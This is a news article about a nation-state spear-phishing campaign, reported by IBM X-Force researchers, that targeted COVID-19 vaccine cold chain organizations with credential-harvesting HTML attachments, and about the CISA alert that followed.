Researchers have discovered a new global spear-phishing campaign that targets organizations associated with the distribution of COVID-19 vaccines since September 2020.
According to IBM Security X-Force researchers, the campaign has been attributed to a nation-state actor. They claimed that the attacks took aim at the vaccine cold chain, companies responsible for storing and delivering the COVID-19 vaccine at safe temperatures.
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert, urging Operation Warp Speed (OWS) organizations and companies involved in vaccine storage and transport to review the indicators of compromise (IoCs) and increase their defenses.
It is however not known whether any of the phishing attempts were successful. The company has notified appropriate entities and authorities about this targeted attack.
The phishing emails, dating to September has targeted organizations in Italy, Germany, South Korea, the Czech Republic, greater Europe, and Taiwan, including the European Commission’s Directorate-General for Taxation and Customs Union, unnamed solar panel manufacturers, a South Korean software development firm, and a German website development company.
The attacks targeted organizations linked to the Gavi vaccine alliance in order to collect user credentials to gain future unauthorized access to corporate networks and sensitive information relating to the COVID-19 vaccine distribution.
The threat actors behind the operation used specially crafted emails that pretended to be requests for quotations for participation in a vaccine program. They also masqueraded as business executive from Haier Biomedical, a legitimate China-based cold chain provider, to convince the recipients to open the inbound emails without prompting any doubt about the sender’s authenticity.
IBM researchers Claire Zaboeva and Melissa Frydrych said that the emails contain malicious HTML attachments that open locally, prompting recipients to enter their credentials to view the file.
The identities of the operators are still unknown, but it is believed that their main aim is to gather usernames and passwords and abuse them to steal intellectual property and move laterally across the victim environments for perform espionage campaigns.
COVID-19 vaccine research and development has always been a target of sustained cyberattacks since the start of the year.
Image Credits : India Today